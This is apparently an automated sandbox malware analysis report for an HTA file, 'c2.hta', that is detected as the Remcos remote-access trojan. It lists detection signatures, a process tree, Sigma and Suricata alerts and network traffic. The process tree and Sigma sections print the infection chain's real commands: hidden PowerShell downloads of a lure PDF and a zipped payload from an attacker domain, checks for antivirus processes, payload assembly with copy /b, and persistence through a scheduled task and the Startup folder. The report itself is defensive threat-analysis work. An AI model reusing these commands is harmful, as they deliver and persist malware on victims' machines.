Edit tour

Windows Analysis Report
c2.hta

Overview

General Information

Sample name:	c2.hta
Analysis ID:	1585143
MD5:	5c4995910d7c98dad7366a0519fe4558
SHA1:	c9ed46e4dcc3e24e484b16d2896e5b2c15595ad5
SHA256:	2ca1167b2c7a42f82c22c1349ce52569820fb0416463e60262b5481ac4926e0a
Tags:	htauser-abuse_ch
Infos:

Detection

Remcos

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Detected Remcos RAT

Multi AV Scanner detection for submitted file

Sigma detected: Drops script at startup location

Sigma detected: Remcos

Sigma detected: Search for Antivirus process

Suricata IDS alerts for network traffic

AI detected suspicious sample

Drops PE files with a suspicious file extension

Drops large PE files

Found API chain indicative of sandbox detection

Installs a global keyboard hook

Loading BitLocker PowerShell Module

Powershell drops PE file

Sigma detected: Legitimate Application Dropped Script

Sigma detected: Suspicious Command Patterns In Scheduled Task Creation

Sigma detected: Suspicious Invoke-WebRequest Execution

Sigma detected: Suspicious MSHTA Child Process

Sigma detected: Suspicious Script Execution From Temp Folder

Sigma detected: WScript or CScript Dropper

Suspicious powershell command line found

Uses schtasks.exe or at.exe to add and modify task schedules

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Wscript called in batch mode (surpress errors)

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates files inside the system directory

Detected TCP or UDP traffic on non-standard ports

Detected non-DNS traffic on DNS port

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for the Microsoft Outlook file path

Sigma detected: PowerShell Web Download

Sigma detected: Suspicious Schtasks From Env Var Folder

Sigma detected: Usage Of Web Request Commands And Cmdlets

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

System is w10x64

mshta.exe (PID: 7164 cmdline: mshta.exe "C:\Users\user\Desktop\c2.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)

cmd.exe (PID: 3180 cmdline: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 3632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 4092 cmdline: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

Acrobat.exe (PID: 2492 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\W2.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)

AcroCEF.exe (PID: 7404 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)

AcroCEF.exe (PID: 7564 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2096 --field-trial-handle=1620,i,2619577598228726768,6450084149098327694,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)

powershell.exe (PID: 6608 cmdline: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

powershell.exe (PID: 5596 cmdline: powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\user\AppData\Local\Temp\msword -Force" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

msword.exe (PID: 5724 cmdline: msword.exe MD5: 83D9A510045DCEB6F520B7599A4B70A7)

cmd.exe (PID: 2188 cmdline: "C:\Windows\System32\cmd.exe" /c move Nr Nr.cmd & Nr.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 3004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 5684 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 4996 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

tasklist.exe (PID: 6656 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 2412 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 6292 cmdline: cmd /c md 361684 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

extrac32.exe (PID: 4828 cmdline: extrac32 /Y /E Approaches MD5: 9472AAB6390E4F1431BAA912FCFF9707)

findstr.exe (PID: 3244 cmdline: findstr /V "Korea" Measurement MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 3164 cmdline: cmd /c copy /b 361684\Propose.com + Different + Constitute + Instantly + Led + Indonesia + Dressing + Missed + Brian + Clinton + Protocol 361684\Propose.com MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

cmd.exe (PID: 3396 cmdline: cmd /c copy /b ..\Next + ..\Math + ..\Blocked + ..\Leisure + ..\Substantial + ..\Beam + ..\Cocks + ..\David + ..\Undefined + ..\Realm U MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Propose.com (PID: 4088 cmdline: Propose.com U MD5: 62D09F076E6E0240548C2F837536A46A)

cmd.exe (PID: 5968 cmdline: cmd /c schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 2672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 1196 cmdline: schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F MD5: 48C2FE20575769DE916F48EF0676A965)

cmd.exe (PID: 1028 cmdline: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url" & echo URL="C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 3084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

choice.exe (PID: 3120 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)

cmd.exe (PID: 5768 cmdline: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\cleanup.bat" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 3052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

timeout.exe (PID: 7868 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

wscript.exe (PID: 4624 cmdline: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)

LinkHub.com (PID: 6072 cmdline: "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\y" MD5: 62D09F076E6E0240548C2F837536A46A)

wscript.exe (PID: 4040 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)

LinkHub.com (PID: 7624 cmdline: "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\y" MD5: 62D09F076E6E0240548C2F837536A46A)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Remcos, RemcosRAT	Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.	APT33 The Gorgon Group UAC-0050	http://malware-traffic-analysis.net/2017/12/22/index.html https://0xmrmagnezi.github.io/malware%20analysis/RemcosRAT/ https://asec.ahnlab.com/en/32376/ https://asec.ahnlab.com/ko/25837/ https://asec.ahnlab.com/ko/32101/	https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Sigma Signatures

System Summary

Sigma detected: Legitimate Application Dropped Script

Source: File created

Author: frack113, Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\mshta.exe, ProcessId: 7164, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\c2[1].bat

Sigma detected: Suspicious Command Patterns In Scheduled Task Creation

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F, CommandLine: schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: cmd /c schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5968, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F, ProcessId: 1196, ProcessName: schtasks.exe

Sigma detected: Suspicious Invoke-WebRequest Execution

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip", CommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 3180, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip", ProcessId: 6608, ProcessName: powershell.exe

Sigma detected: Suspicious MSHTA Child Process

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat", CommandLine: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\c2.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7164, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat", ProcessId: 3180, ProcessName: cmd.exe

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip", CommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 3180, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip", ProcessId: 6608, ProcessName: powershell.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js", ProcessId: 4624, ProcessName: wscript.exe

Sigma detected: PowerShell Web Download

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf", CommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 3180, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf", ProcessId: 4092, ProcessName: powershell.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf", CommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 3180, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf", ProcessId: 4092, ProcessName: powershell.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js", ProcessId: 4624, ProcessName: wscript.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf", CommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 3180, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf", ProcessId: 4092, ProcessName: powershell.exe

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 1028, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url

HIPS / PFW / Operating System Protection Evasion

Sigma detected: Search for Antivirus process

Source: Process started

Author: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Nr Nr.cmd & Nr.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2188, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 2412, ProcessName: findstr.exe

Stealing of Sensitive Information

Sigma detected: Remcos

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com, ProcessId: 4088, TargetFilename: C:\ProgramData\remcos\logs.dat

Suricata Signatures

ET JA3 Hash - Remcos 3.x/4.x TLS Connection

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-07T06:24:10.520484+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.4	49827	193.26.115.39	7009	TCP

ETPRO MALWARE Common Downloader Header Pattern HCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-07T06:24:11.640540+0100	2803304	3	Unknown Traffic	192.168.2.4	49835	178.237.33.50	80	TCP

Joe Security ANOMALY Windows PowerShell HTTP activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-07T06:23:01.619350+0100	1810000	2	Potentially Bad Traffic	192.168.2.4	49734	193.26.115.39	443	TCP
2025-01-07T06:23:05.236348+0100	1810000	2	Potentially Bad Traffic	192.168.2.4	49736	193.26.115.39	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://myguyapp.com/msword.zip	Avira URL Cloud: Label: malware
Source: https://myguyapp.com/c2.bat	Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Source: c2.hta

ReversingLabs: Detection: 18%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 98.0% probability

Source: unknown	HTTPS traffic detected: 193.26.115.39:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 193.26.115.39:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 193.26.115.39:443 -> 192.168.2.4:49736 version: TLS 1.2

Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Code function: 15_2_004062D5 FindFirstFileW,FindClose,	15_2_004062D5
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Code function: 15_2_00402E18 FindFirstFileW,	15_2_00402E18
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Code function: 15_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	15_2_00406C9B
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00C2A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	38_2_00C2A087
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00C2A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	38_2_00C2A1E2
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00C1E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	38_2_00C1E472
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00C2A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,	38_2_00C2A570
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00C266DC FindFirstFileW,FindNextFileW,FindClose,	38_2_00C266DC
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00BEC622 FindFirstFileExW,	38_2_00BEC622
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00C273D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	38_2_00C273D4
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00C27333 FindFirstFileW,FindClose,	38_2_00C27333
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00C1D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	38_2_00C1D921
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00C1DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	38_2_00C1DC54

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\msword	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\msword\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49827 -> 193.26.115.39:7009

Source: global traffic

TCP traffic: 192.168.2.4:49827 -> 193.26.115.39:7009

Source: global traffic

TCP traffic: 192.168.2.4:61038 -> 1.1.1.1:53

Source: global traffic

HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

Source: Joe Sandbox View

IP Address: 178.237.33.50 178.237.33.50

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49835 -> 178.237.33.50:80
Source: Network traffic	Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49736 -> 193.26.115.39:443
Source: Network traffic	Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49734 -> 193.26.115.39:443

Source: global traffic	HTTP traffic detected: GET /c2.bat HTTP/1.1Accept: /Accept-Language: en-CHAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: myguyapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /W2.pdf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: myguyapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /msword.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: myguyapp.comConnection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
